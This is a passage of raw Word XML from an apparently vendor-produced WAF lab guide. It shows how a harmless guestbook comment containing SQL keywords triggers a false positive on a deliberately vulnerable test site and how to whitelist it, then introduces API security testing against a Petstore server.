      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this causes </w:t>
      </w:r>
      <w:r w:rsidR="00650ED1">
        <w:t>a legitimate request to be blocked</w:t>
      </w:r>
      <w:r w:rsidR="00A43F2E">
        <w:t>, otherwise known as a false positive.</w:t>
      </w:r>
      <w:r w:rsidR="004004D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDDECB3" w14:textId="77777777" w:rsidR="00826478" w:rsidRDefault="00826478" w:rsidP="006B6BEC"/>
    <w:p w14:paraId="02ED1B50" w14:textId="77777777" w:rsidR="00662BC5" w:rsidRDefault="00662BC5" w:rsidP="00662BC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, protected) click the Sign Guestbook link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D6D1B" w14:textId="136D04F6" w:rsidR="00662BC5" w:rsidRDefault="00662BC5" w:rsidP="00662BC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fill </w:t>
      </w:r>
      <w:r w:rsidR="00020B07">
        <w:t xml:space="preserve">in the name and email fields, then add the following text in the </w:t>
      </w:r>
      <w:r w:rsidR="00A542BD">
        <w:t>Comments field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12006E4A" w14:textId="7054E9FF" w:rsidR="00A542BD" w:rsidRDefault="00293C09" w:rsidP="007A1CB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00293C09">
        <w:t>I tried to order from the union of your stores, but when I try to select a product, from your selection, I cannot!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F368EB" w14:textId="67E32427" w:rsidR="00450BD6" w:rsidRDefault="00450BD6" w:rsidP="00450BD6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The WAF blocks the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47584D44" w14:textId="77777777" w:rsidR="000B09F3" w:rsidRDefault="000B09F3" w:rsidP="000B09F3"/>
    <w:p w14:paraId="13CD6B64" w14:textId="4DFF71C9" w:rsidR="000B09F3" w:rsidRDefault="000B09F3" w:rsidP="000B09F3">
      <w:r>
        <w:t xml:space="preserve">Since this is legitimate traffic, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> allow it through the WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF57653" w14:textId="6EB595CC" w:rsidR="000B09F3" w:rsidRDefault="000B09F3" w:rsidP="000B09F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>On browser tab #1</w:t>
      </w:r>
      <w:r w:rsidR="00AC08B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF276C">
        <w:t>(WAF Admin UI) navigate to BASIC &gt; Web Firewall Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C8E54" w14:textId="789D36A7" w:rsidR="00AF276C" w:rsidRDefault="00AF276C" w:rsidP="000B09F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You will see an entry like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D42BEB" w14:textId="748BFD61" w:rsidR="00AF276C" w:rsidRDefault="00B23ED0" w:rsidP="00D91258">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E03972F" wp14:editId="4EF93272">
            <wp:extent cx="5798958" cy="67216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8483" cy="674426"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23294FF4" w14:textId="653FCB75" w:rsidR="00662BC5" w:rsidRDefault="00D91258" w:rsidP="00D91258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F54E75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> button</w:t>
      </w:r>
      <w:r w:rsidR="003B175C">
        <w:t xml:space="preserve">. A new dialog opens with a description of </w:t>
      </w:r>
      <w:r w:rsidR="004C09E4">
        <w:t xml:space="preserve">the attack and how to </w:t>
      </w:r>
      <w:r w:rsidR="0005737B">
        <w:t>mark it as a false positive. Cli</w:t>
      </w:r>
      <w:r w:rsidR="005F3BF2">
        <w:t xml:space="preserve">ck </w:t>
      </w:r>
      <w:r w:rsidR="005F3BF2" w:rsidRPr="00F54E75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apply Fix</w:t>
      </w:r>
      <w:r w:rsidR="00CB6707">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005720A5">
        <w:t xml:space="preserve"> After a few </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005720A5">
        <w:t>seconds</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005720A5">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="005E4BBE">
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r w:rsidR="00002501">
        <w:t xml:space="preserve">policy will be updated. Click </w:t>
      </w:r>
      <w:r w:rsidR="00002501" w:rsidRPr="00F54E75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Close Window</w:t>
      </w:r>
      <w:r w:rsidR="00002501">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A537D35" w14:textId="25D788BE" w:rsidR="00002501" w:rsidRDefault="00002501" w:rsidP="00D91258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Repeat the guest</w:t>
      </w:r>
      <w:r w:rsidR="00B4758E">
        <w:t>book entry. This time the entry is allowed by the WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238BD7C" w14:textId="77777777" w:rsidR="007B4A2B" w:rsidRDefault="007B4A2B" w:rsidP="007B4A2B"/>
    <w:p w14:paraId="464D6AC3" w14:textId="5F611A01" w:rsidR="007B4A2B" w:rsidRDefault="00257005" w:rsidP="00600F87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc76995349"/>
      <w:r>
        <w:t xml:space="preserve">Further </w:t>
      </w:r>
      <w:r w:rsidR="002609FA">
        <w:t>Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="595942BD" w14:textId="77777777" w:rsidR="002609FA" w:rsidRDefault="002609FA" w:rsidP="007B4A2B"/>
    <w:p w14:paraId="62A8156E" w14:textId="473BE6EF" w:rsidR="00B06BE3" w:rsidRDefault="00600F87" w:rsidP="003112B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are other vulnerabilities in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web site. </w:t>
      </w:r>
      <w:r w:rsidR="003112B9">
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="003112B9" w:rsidRPr="0026770B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>numerous</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003112B9">
        <w:t xml:space="preserve"> websites and blog posts detailing the </w:t>
      </w:r>
      <w:r w:rsidR="005C7DD4">
        <w:t xml:space="preserve">various ways that these exploits can </w:t>
      </w:r>
      <w:r w:rsidR="005B369F">
        <w:t xml:space="preserve">be demonstrated. </w:t>
      </w:r>
      <w:r w:rsidR="00AD5897">
        <w:t xml:space="preserve">An example </w:t>
      </w:r>
      <w:r w:rsidR="0026770B">
        <w:t>can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E546CF1" w14:textId="77777777" w:rsidR="00B06BE3" w:rsidRDefault="00B06BE3" w:rsidP="00BA705E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1ED4C6" w14:textId="77777777" w:rsidR="00600F87" w:rsidRPr="00286DC0" w:rsidRDefault="00600F87" w:rsidP="00BA705E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B4B762" w14:textId="64D5ABBA" w:rsidR="00A76640" w:rsidRPr="00286DC0" w:rsidRDefault="00A76640" w:rsidP="00A76640">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc76995350"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Advanced Application Security Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2AEBF9E1" w14:textId="77777777" w:rsidR="00A76640" w:rsidRPr="00286DC0" w:rsidRDefault="00A76640" w:rsidP="00A76640"/>
    <w:p w14:paraId="1E83B111" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:r w:rsidRPr="009E3CE3">
        <w:t>Internet-facing APIs are highly prevalent today. The number of systems that speak to each other to accomplish various functions – from buying a phone on a payment plan to paying for lunch online – is enormous, and all of them use APIs. APIs require significant security at the application layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70380956" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3"/>
    <w:p w14:paraId="3D2CAE85" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:r w:rsidRPr="009E3CE3">
        <w:t>WAF-as-a-Service protects APIs from attacks using the following (partial list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FF9E2" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t>Providing a Secure TLS channel to the API Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29923D94" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve">Enforcing HTTP Verb-based Security Constraints </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A510E96" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t>Enforcing endpoint and JSON key constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A976B2" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t>Enforcing Rate-Limits on API endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B5B35" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve">Filtering Malicious Data from Untrusted User Inputs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52270A92" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3CE3">
        <w:t>Uninterrupted API Delivery with Virtual Patching and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD68DE" w14:textId="77777777" w:rsidR="009E3CE3" w:rsidRPr="009E3CE3" w:rsidRDefault="009E3CE3" w:rsidP="009E3CE3">
      <w:r w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve">Modern API’s have an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E3CE3">
        <w:t>OpenAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve"> specification that defines the API structure.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825D86F" w14:textId="77777777" w:rsidR="001D5883" w:rsidRDefault="001D5883" w:rsidP="00A76640"/>
    <w:p w14:paraId="10F22404" w14:textId="74B1F30F" w:rsidR="00A76640" w:rsidRDefault="00A76640" w:rsidP="00A76640">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D07308">
        <w:t>move to</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> some </w:t>
      </w:r>
      <w:r w:rsidR="00D07308">
        <w:t>more advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> web application attacks against our vulnerable applications. </w:t>
      </w:r>
      <w:r w:rsidR="00D07308">
        <w:t>Again, w</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t>e will attack our unprotected application first, observing its behavior. We will attempt the same attack through the WAF and observe how the application is protected.</w:t>
      </w:r>
      <w:r w:rsidR="00807DCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve">We will use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Petstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> API server</w:t>
      </w:r>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve"> listening on port </w:t>
      </w:r>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidR="00807DCA" w:rsidRPr="009E3CE3">
        <w:t xml:space="preserve"> as our test server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0EA4AD" w14:textId="77777777" w:rsidR="00A70DD4" w:rsidRDefault="00A70DD4" w:rsidP="00A76640"/>
    <w:p w14:paraId="39D4E728" w14:textId="77777777" w:rsidR="00A76640" w:rsidRPr="00286DC0" w:rsidRDefault="00A76640" w:rsidP="00392965"/>
    <w:sectPr w:rsidR="00A76640" w:rsidRPr="00286DC0" w:rsidSect="00137092">
      <w:headerReference w:type="default" r:id="rId39"/>
      <w:footerReference w:type="default" r:id="rId40"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="2009" w:right="1440" w:bottom="1440" w:left="1440" w:header="64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A1E9" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902C29" w:rsidP="003B7843">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59C8D529" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902C29" w:rsidP="003B7843">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="73852C04" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902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Headings CS)">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9A8F" w14:textId="3607B92C" w:rsidR="004A133F" w:rsidRPr="00916C56" w:rsidRDefault="00B73AC1" w:rsidP="00916C56">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r w:rsidRPr="00916C56">
      <w:t xml:space="preserve">Last Updated </w:t>
    </w:r>
    <w:r w:rsidR="005261C7">
      <w:t>Jun16</w:t>
    </w:r>
    <w:r w:rsidR="00DE4D6E" w:rsidRPr="00916C56">
      <w:t>-</w:t>
    </w:r>
    <w:r w:rsidR="005261C7">
      <w:t>2021</w:t>
    </w:r>
    <w:r w:rsidRPr="00916C56">
      <w:t xml:space="preserve"> • US 1.0</w:t>
    </w:r>
    <w:r w:rsidR="004A133F" w:rsidRPr="00916C56">
      <w:t xml:space="preserve"> • Copyright 20</w:t>
    </w:r>
    <w:r w:rsidR="005261C7">
      <w:t>21</w:t>
    </w:r>
    <w:r w:rsidR="004A133F" w:rsidRPr="00916C56">
      <w:t xml:space="preserve"> Barracuda Networks, Inc. • 3175 S. Winchester Blvd., Campbell, CA 95008 • 408-342-5400/888-268-4772 (US &amp; Canada) • barracuda.com</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2387B184" w14:textId="163B7576" w:rsidR="004A133F" w:rsidRPr="00916C56" w:rsidRDefault="004A133F" w:rsidP="00916C56">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r w:rsidRPr="00916C56">
      <w:t>Barracuda Networks and the Barracuda Networks logo are re</w:t>
    </w:r>
    <w:r w:rsidR="0016733A">
      <w:t>giste</w:t>
    </w:r>
    <w:r w:rsidRPr="00916C56">
      <w:t>red trademarks of Barracuda Networks, Inc. in the United States. All other names are the property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1500" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902C29" w:rsidP="003B7843">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="107E899B" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902C29" w:rsidP="003B7843">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="610744A6" w14:textId="77777777" w:rsidR="00902C29" w:rsidRDefault="00902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A52A" w14:textId="77777777" w:rsidR="00237BE3" w:rsidRDefault="003B7843">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD80C33" wp14:editId="1458EE9A">
          <wp:extent cx="1755648" cy="395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arracuda_primary.png"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1755648" cy="3954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8EB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2E0F5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34A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5EA1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7309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B650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50B9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BEA2F4"/>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A3EA7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26C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6D37EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1AE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52DEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9990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D56473"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9226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76EF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C60C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E5F6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A75280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2998554B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6A0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06A22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFA2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63B48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3D4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C022C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C832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A23EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="876A5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96D6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45A8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F1688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E6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55154"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8128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41520"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57C22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B68ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AA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1A5102"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B770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44E05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C04479A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7E2941F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50E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7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="2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B7843"/>
    <w:rsid w:val="00002501"/>
    <w:rsid w:val="0000392F"/>
    <w:rsid w:val="0001545C"/>
    <w:rsid w:val="00020B07"/>
    <w:rsid w:val="00022FBF"/>
    <w:rsid w:val="00025C37"/>
    <w:rsid w:val="00033EBE"/>
    <w:rsid w:val="00041124"/>
    <w:rsid w:val="00042F22"/>
    <w:rsid w:val="000434B9"/>
    <w:rsid w:val="00050238"/>
    <w:rsid w:val="0005254A"/>
    <w:rsid w:val="0005737B"/>
    <w:rsid w:val="000603D7"/>
    <w:rsid w:val="00062807"/>
    <w:rsid w:val="00066CB4"/>
    <w:rsid w:val="00076933"/>
    <w:rsid w:val="000773A1"/>
    <w:rsid w:val="00077428"/>
    <w:rsid w:val="00082AAA"/>
    <w:rsid w:val="00086418"/>
    <w:rsid w:val="000A4313"/>
    <w:rsid w:val="000B09F3"/>
    <w:rsid w:val="000C6CEB"/>
    <w:rsid w:val="000C77CF"/>
    <w:rsid w:val="000E385C"/>
    <w:rsid w:val="000E7DD9"/>
    <w:rsid w:val="0010289C"/>
    <w:rsid w:val="00103207"/>
    <w:rsid w:val="00106BBF"/>
    <w:rsid w:val="001118A3"/>
    <w:rsid w:val="0011625C"/>
    <w:rsid w:val="001165FF"/>
    <w:rsid w:val="00124DD7"/>
    <w:rsid w:val="00135320"/>
    <w:rsid w:val="00137092"/>
    <w:rsid w:val="00141E46"/>
    <w:rsid w:val="00162FD1"/>
    <w:rsid w:val="0016733A"/>
    <w:rsid w:val="001823E6"/>
    <w:rsid w:val="0018295D"/>
    <w:rsid w:val="001A0342"/>
    <w:rsid w:val="001A04D9"/>
    <w:rsid w:val="001A5C0B"/>
    <w:rsid w:val="001B347F"/>
    <w:rsid w:val="001C0377"/>
    <w:rsid w:val="001C17F6"/>
    <w:rsid w:val="001D5883"/>
    <w:rsid w:val="001D6B58"/>
    <w:rsid w:val="001E3978"/>
    <w:rsid w:val="001E4A64"/>
    <w:rsid w:val="001E7FFD"/>
    <w:rsid w:val="00203C09"/>
    <w:rsid w:val="00204C76"/>
    <w:rsid w:val="00213615"/>
    <w:rsid w:val="00215ED7"/>
    <w:rsid w:val="00227BBB"/>
    <w:rsid w:val="00231505"/>
    <w:rsid w:val="00237BE3"/>
    <w:rsid w:val="00243F8F"/>
    <w:rsid w:val="00255F07"/>
    <w:rsid w:val="00257005"/>
    <w:rsid w:val="002609FA"/>
    <w:rsid w:val="00261CE9"/>
    <w:rsid w:val="0026770B"/>
    <w:rsid w:val="00272B50"/>
    <w:rsid w:val="00286DC0"/>
    <w:rsid w:val="002916EE"/>
    <w:rsid w:val="00293C09"/>
    <w:rsid w:val="002A0B61"/>
    <w:rsid w:val="002A7B0C"/>
    <w:rsid w:val="002C286B"/>
    <w:rsid w:val="002C31A1"/>
    <w:rsid w:val="002D1AA0"/>
    <w:rsid w:val="002E4BB2"/>
    <w:rsid w:val="00307DC7"/>
    <w:rsid w:val="003112B9"/>
    <w:rsid w:val="0032467F"/>
    <w:rsid w:val="00324D14"/>
    <w:rsid w:val="003366CF"/>
    <w:rsid w:val="00353A19"/>
    <w:rsid w:val="003577EF"/>
    <w:rsid w:val="003650CA"/>
    <w:rsid w:val="003654BC"/>
    <w:rsid w:val="00365AE6"/>
    <w:rsid w:val="00370165"/>
    <w:rsid w:val="00384002"/>
    <w:rsid w:val="00386CC2"/>
    <w:rsid w:val="0039200D"/>
    <w:rsid w:val="00392965"/>
    <w:rsid w:val="0039450A"/>
    <w:rsid w:val="003A04DC"/>
    <w:rsid w:val="003A2867"/>
    <w:rsid w:val="003A4087"/>
    <w:rsid w:val="003A5BD8"/>
    <w:rsid w:val="003B00D4"/>
    <w:rsid w:val="003B175C"/>
    <w:rsid w:val="003B333A"/>
    <w:rsid w:val="003B7843"/>
    <w:rsid w:val="003C0DB4"/>
    <w:rsid w:val="003C36B7"/>
    <w:rsid w:val="003D3232"/>
    <w:rsid w:val="004004D5"/>
    <w:rsid w:val="0041447A"/>
    <w:rsid w:val="00414921"/>
    <w:rsid w:val="004151BE"/>
    <w:rsid w:val="00432286"/>
    <w:rsid w:val="00437706"/>
    <w:rsid w:val="00440964"/>
